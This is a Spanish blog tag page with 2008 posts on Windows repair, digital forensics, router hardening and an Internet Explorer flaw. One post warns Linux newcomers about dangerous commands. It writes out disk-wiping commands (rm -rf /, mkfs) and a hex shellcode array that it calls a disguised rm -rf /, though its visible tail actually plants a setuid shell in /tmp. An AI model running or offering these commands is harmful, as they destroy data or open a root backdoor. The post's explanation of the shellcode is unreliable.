Posts Tagged ‘Linux’

Microsoft confirma una vulnerabilidad crítica en todos su IE

diciembre 16, 2008

Microsoft ha confirmado que existe un problema sin parchear en Internet Explorer 7 que usuarios malintencionados podrían explotar. La confirmación se extiende aún más al confirmar que el mismo problema afecta a las versiones anteriores del navegador e incluso a la versión beta 2 de Internet Explorer 8.

Mientras parchean el bug recomiendan encarecidamente deshabilitar el archivo Oledb32.dll para permanecer seguros.

Un investigador de seguridad danés ha informado del problema a Microsoft y de que la medida original que Microsoft estaba tomando era insuficiente para solucionar el problema. En una auditoría de seguridad han confirmado que el bug se extiende a todos sus navegadores.

Microsoft ha confirmado que están trabajando activamente junto con sus compañeros del Microsoft Active Protections Program (MAPP) y su programa Microsoft Security Response Alliance (MSRA) para disponer de información que puedan usar para ofrecer mejor protección para sus usuarios. Mientras llega la solución Microsoft está monitorizando el horizonte de amenazas para tomar acción sobre sitios que intenten explotar dicha vulnerabilidad.

Anuncios

Analisis forense de los ficheros Thumbs.db

diciembre 15, 2008

Los ficheros Thumbs.db  son ficheros propios de los sistemas Microsoft Windows, empleados para almacenar información que tiene que ver con las imágenes y fotografías contenidas en un directorio.

Los sistemas Windows pueden almacenar información de las miniaturas de las imágenes de un directorio del sistema, así como sus metadatos asociados.

El objetivo de estos ficheros es acelerar la aparición de imágenes, ya que las imágenes más pequeñas no se recalculan cada vez que el usuario visualiza las miniaturas de una carpeta. Como consecuencia de lo anterior, si en un sistema Windows empleamos la opción “Mostrar archivos ocultos”, aparecerán con frecuencia ficheros Thumbs.db acompañando a las imágenes y fotografías que tengamos en un directorio, siempre que hayamos empleado la vista de miniaturas.

Técnicamente hablando, los ficheros Thumbs.db son OLE structured storage files, o si lo preferimos, ficheros OLE de almacenamiento estructurado.

Extracción de información

Vamos a coger un fichero Thumbs.db públicamente accesible, también necesitaremos un programa de análisis, en este caso, Vinetto, orientado al análisis forense de estos ficheros.

(more…)

Siete comandos peligrosos para Linux

noviembre 28, 2008

Si eres nuevo en Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

  1. rm -rf /
    Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.
  2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.
  3. mkfs.ext3 /dev/sda
    Este comando formatea la partición que se menciona después de mkfs. (more…)

Análisis forense de elementos enviados a la papelera de reciclaje.

noviembre 27, 2008

Una técnica de análisis en sistemas muertos que se utiliza para saber que elementos contiene la papelera de reciclaje, cuando han sido eliminados y quien los elimino. En primer lugar necesitamos saber donde almacena Windows la papelera de reciclaje:

  • Windows 95/98/ME en “C:\Recycled\”
  • Windows NT/2000/XP/ en “C:\Recycler\”

Un ejemplo en de la estructura en un Windows XP con dos usuarios:

C:\RECYCLER\S-1-5-21-1417001333-343818398-1801674531-1004
C:\RECYCLER\ S-1-5-21-1417001333-343818398-1801674531-500

Dentro de estas carpetas de los dos usurarios de este sistema se encuentran los archivos borrados de cada uno. Además de estos archivos se encuentra también un archivo llamado INFO2 donde se almacena la información sobre cuando se borro y de donde se borro el archivo. Se puede extraer esta información con un editor hexadecimal, aunque es más fácil utilizar la herramienta rifiuti.
(more…)

CAINE, LiveCD GNU/Linux para Informática Forense

noviembre 27, 2008

CAINE (Computer Aided INvestigative Environment), es una distribución GNU/Linux en modo LiveCD creada por Giancarlo Giustini como un proyecto de Informática Forense (Forense Digital) para el Centro de Investigación en Seguridad (CRIS), con el apoyo de la Universidad de Modena y Reggio Emilia.

El proyecto CAINE (Computer Aided INvestigative Environment) no pretende ser una nueva herramienta forense o framework de recopilación de ellas, pues este tipo de distribuciones ya existen (ej. Felix FCCU, Deft, entre otras). CAINE propone como novedad un nuevo entorno de fácil uso para todo este tipo de herramientas. Además introduce nuevas características importantes, que aspiran a llenar el vacio de interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las pruebas electrónicas, y ofrece un proceso semi-automático durante la documentación y  generación de informes  y resultados.

page3-1002-full

page3-1005-full

(more…)

10 Consejos para mejorar la seguridad del router

noviembre 11, 2008

La mayoría de gente que instala una red casera nunca investiga las opciones de seguridad de su router. 

Aqui os dejo 10 consejos que puedes usar para hacer tu red más segura.  Para jugar con las opciones del router, es necesario acceder a su panel de control, y esto se hace escribiendo la dirección IP interna del router en el navegador web de cualquier PC de la red local. Para routers DLink esta dirección será http://192.168.0.1 Para routers Linksys es http://192.168.1.1, y http://192.168.1.2 para otros routers. Revisa el manual del router si ninguna de las anteriores funcionó, o mira la dirección IP del gateway por defecto con el comando ipconfig /all (ifconfig en GNU/Linux).

1. Deshabilitar UPnP

UPnP, o Universal Plug and Play, es una función practica que permite a los dispositivos en una red autoconfigurarse solos, pero también es un riesgo de seguridad. Un troyano o un virus en una maquina de tu red podría usar UPnP para abrir un agujero en el firewall de tu router y permitir la entrada a foraneos. Así pues, es buena idea deshabilitar UPnP cuando no se utilize.

2. Cambiar la contraseña del administrador

Los routers vienen de fábrica con un ID de usuario y una contraseña para salvaguardar un panel de configuración del router. En un router DLink el ID de usuario es admin y la contraseña queda en blanco. Por lo tanto se debería cambiar (o crear) la contraseña lo antes posible para evitar que intrusos modifiquen la configuración del router.

(more…)

HAL.DLL falta o está dañado

noviembre 10, 2008

Si no puedes iniciar Windows a causa del mensaje de error siguiente:

HAL.DLL falta o está dañado

Windows could not start because the following file is missing or corrupt: Windows\System32
\Hal.dll

No se ha iniciado Windows porque el siguiente archivo falta o está dañado: Windows\System32
\Hal.dll

En la mayoría de los casos la causa del problema no es el DLL sino el archivo BOOT.INI.

Las letras de unidad son solo ejemplos, en cada caso, deberán ser ajustadas a las configuraciones de cada persona.

El orden en que deben ser intentados estos pasos es el mismo en que los escribo debido a que aumenta el nivel de complejidad.

Todos los pasos han de ser seguidos cuidadosamente y prestando a tención a los mensajes en pantalla, si en cualquier momento se tienen dudas o no se sabe como continuar, lo mejor es consultar con alguien que sepa lo que hace.

El método de reparación desde otra máquina ofrece la ventaja adicional de poder hacer una copia de emergencia de los datos.

1. Desde la consola de reparación del sistema:
(Este método solo funciona en Windows XP o 2003)

  • Arrancar la máquina con el cd de instalación del sistema.
  • Iniciar la consola de reparación siguiendo las instrucciones en pantalla para tal fin.
  • Escribir: attrib -R-H-S C:\boot.ini.
  • Escribir: del C:\boot.ini
  • Escribir: bootcfg /rebuild
  • Escribir: fixboot
  • Tras reiniciar el sistema todo debería haber vuelto a la normalidad

2. Desde otra máquina:

  • Desmontar el disco con el sistema dañado y montarlo como esclavo en otra máquina con sistema operativo Windows 2000 o superior.
  • Arrancar el sistema de la máquina anfitrión y permitir al sistema anfitrión realizar todos los procesos de detección necesarios.
  • Reiniciar el sistema anfitrión.
  • Una vez reiniciado, activar la opción de ver archivos ocultos y de sistema.
  • Con el explrador de archivos, localizar la carpeta E:\Windows\ServicePackFiles\i386 si estamos reparando un Windows XP o E:\Winnt\ServicePackFiles\i386 si estamos reparando un Windows 2000.
  • Copiar el archivo hal.dll que se encuentra allí a la carpeta E:\Windows\System32 o E:\Winnt\System32. Si pregunta por sobreescribir, responder que si.
  • Apagar el sistema anfitrión
  • Desmontar el disco esclavo.
  • Reinstalarlo como maestro en su computadora de origen.
  • Reiniciar el sistema.

3. Desde la misma máquina pero con otro sistema operativo instalado:

  • El otro sistema operativo debe poder leer sistemas de archivos NTFS modernos, por lo que debe ser, al menos, Windows 2000.
  • Arrancar el segundo sistema de la máquina.
  • Una vez iniciado, activar la opción de ver archivos ocultos y de sistema.
  • Con el explrador de archivos, localizar la carpeta C:\WINDOWS\ServicePackFiles\i386 si estamos reparando un Windows XP o C:\WINNT\ServicePackFiles\i386 si estamos reparando un Windows 2000.
  • Copiar el archivo hal.dll que se encuentra allí a la carpeta C:\WINDOWS\System32 o C:\WINNT\System32. Si pregunta por sobreescribir, responder que si.
  • Reiniciar el sistema.

4. Copiando el archivo desde el cd de instalación original:

  • Arrancar la máquina con el cd de instalación del sistema.
  • Iniciar la consola de reparación siguiendo las instrucciones en pantalla para tal fin.
  • Escribir: type C:\Windows\Repair\Setup.log si es un sistema Windows XP o C:\Winnt\Repair\Setup.log si es un sistema Windows 2000.
  • Buscar la línea que contenga hal.dll, debe ser una línea similar a esta: \Windows\system32\ hal.dll=”halacpi.dll”,”1d8a1″.
  • Copiar en un papel el nombre del archivo que aparece a la derecha del signo de igualdad. Nos refriremos a este archivo en las iguientes líneas como ArchivoHal.
  • Escribir: attrib -R-H-S C:\Windows\System32\hal.dll si es un sistema Windows XP o attrib -R -H -S C:\Winnt\System32\hal.dll si es un sistema con Windows 2000. Si el archivo en efecto ha desaparecido del sistema aparecerá un mensaje de error advirtiéndonos de tal situación.
  • Escribir: del C:\Windows\System32\hal.dll si es un sistema Windows XP o del C:\Winnt\System32\hal.dll si es un sistema con Windows 2000. Si el archivo en efecto ha desaparecido del sistema aparecerá un mensaje de error advirtiéndonos de tal situación.
  • Escribir: expand ArchivoHal /F:D:\I386\Driver.cab C:\Windows\System32\hal.dll /Y si es un sistema Windows XP o expand ArchivoHal /F:D:\I386\Driver.cab C:\Winnt\System32\hal.dll /Y si es un sistema con Windows 2000.
  • Escribir: ren C:\Windows\System32\ArchivoHal C:\Windows\System32\hal.dll si es un sistema Windows XP o ren C:\Winnt\System32\ArchivoHal C:\Winnt\System32\hal.dll si es un sistema con Windows 2000.
    • Si al tratar de renombrar el archivo nos pregunta por sobreescribir uno existente, responder que si.
    • Si no se puede sobreescribir el archivo existente, escribir: del C:\Windows\System32\hal.dll si es un sistema Windows XP o del C:\Winnt\System32\hal.dll si es un sistema con Windows 2000 y reintentar el paso anterior.
  • Reiniciar el sistema.

Error Windows XP: “programa AutoCheck no se encuentra”

noviembre 4, 2008

Este problema se produce porque el archivo Autochk.exe está dañada o falta.

Al iniciar un equipo basado en Microsoft Windows XP, puede aparecer el mensaje de error siguiente:

Programa AutoCheck que no se encuentra

Para resolver este problema, siga estos pasos:

1- Inserte el disco de inicio de Windows XP y, a continuación, cierre la ventana para Microsoft Windows XP si aparece.

2- Haga clic en Inicio , haga clic en Ejecutar , escriba cmd y, a continuación, haga clic en Aceptar .

3- En el símbolo del sistema, escriba el comando siguiente y presione ENTRAR.

Copiar drive letter: \i386\autochk.exe %WINDIR%\system32

Tenga en cuenta El marcador de posición drive letter representa la unidad, como “d:”, que está ejecutando el disco de inicio de Windows XP.

4- Escriba S cuando reciba el mensaje siguiente:
   ¿Desea sobrescribir C:\WINDOWS\system32\autochk.exe? (Sí/No/Todas):
5- Quite el disco de inicio de Windows XP y, a continuación, reinicie el equipo.

Navegación en modo “kiosko”

noviembre 4, 2008

Internet explorer se puede ejecutar en modo kiosco, una versión pensada para ordenadores públicos en los que se quiere permitir la navegación pero limitar las opciones de los usuarios. Al ejecutarse en modo kiosko, el navegador ocupa toda la pantalla, sólo hay una pequeña barra con las funciones de navegación básicas y el usuario no puede acceder al menú inicio y a otros programas a no ser que pulse algunas combinaciones de teclas.

Es importante recordar que el modo kiosko no es 100% seguro y que resulta muy fácil salir de él, basta con pulsar ALT+F4.

Para ejecutar Internet Explorer en modo kiosKo:

1- Haga clic en Inicio

2- Seleccione Ejecutar

3- Escriba iexplorer -k www.pescamenorca.com en el cuadro abrir

Esto abrirá la página web de Pesca en Menorca pero puede probar conotras si lo prefiere.

Cambiar el puerto por defecto de Terminal Server

noviembre 1, 2008

En ocasiones y por cuestiones de seguridad, nos interesaría cambiar el puerto predeterminado para Terminal Server, el 3389, por otro cualquiera que este entre el 49152 y el 65535. Pues bien, el procedimiento es el siguiente:

Abrimos el registro en el servidor y vamos a la rama:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
aquí abrimos PortNumber y en decimal cambiamos el valor por uno a nuestro antojo, por ejemplo 51261. Reiniciamos el equipo.

Ahora para conectarnos con nuestro cliente RDP solo tendremos que añadir a nuestra dirección IP el puerto configurado. por ejemplo: 200.13.224.225:51261